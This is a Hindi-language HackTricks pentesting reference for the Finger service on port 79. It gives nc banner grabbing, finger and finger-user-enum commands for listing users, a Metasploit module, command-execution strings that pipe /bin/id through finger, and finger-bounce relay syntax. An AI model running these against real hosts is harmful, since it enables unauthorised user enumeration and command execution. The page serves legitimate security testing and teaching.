hacktricks/network-services-pentesting/pentesting-finger.md

6.2 KiB

79 - पेंटेस्टिंग फिंगर

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

मूल जानकारी

फिंगर प्रोग्राम/सेवा का उपयोग कंप्यूटर उपयोगकर्ताओं के बारे में विवरण प्राप्त करने के लिए किया जाता है। सामान्यत: प्रदान की जाने वाली जानकारी में उपयोगकर्ता का लॉगिन नाम, पूरा नाम और, कई मामलों में, अतिरिक्त विवरण शामिल हो सकते हैं। ये अतिरिक्त विवरण कार्यालय स्थान और फोन नंबर (यदि उपलब्ध है), उपयोगकर्ता ने कब लॉग इन किया, निष्क्रिय समय की अवधि (आइडल समय), उपयोगकर्ता द्वारा अंतिम बार मेल पढ़ा गया, और उपयोगकर्ता की योजना और परियोजना फ़ाइलों की सामग्री शामिल हो सकती है।

डिफ़ॉल्ट पोर्ट: 79

PORT   STATE SERVICE
79/tcp open  finger

जांच

बैनर ग्रबिंग/मूल कनेक्शन

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

उपयोगकर्ता गणना

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

आप finger-user-enum का उपयोग कर सकते हैं pentestmonkey से, कुछ उदाहरण:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap डिफ़ॉल्ट स्क्रिप्ट का उपयोग करने के लिए एक स्क्रिप्ट को निष्पादित करता है

Metasploit Nmap से अधिक तरीके का उपयोग करता है

use auxiliary/scanner/finger/finger_users

शोडन

  • port:79 USER

कमांड निष्पादन

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

फिंगर बाउंस

एक सिस्टम का उपयोग एक फिंगर रिले के रूप में करें

finger user@host@victim
finger @internal@external
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए: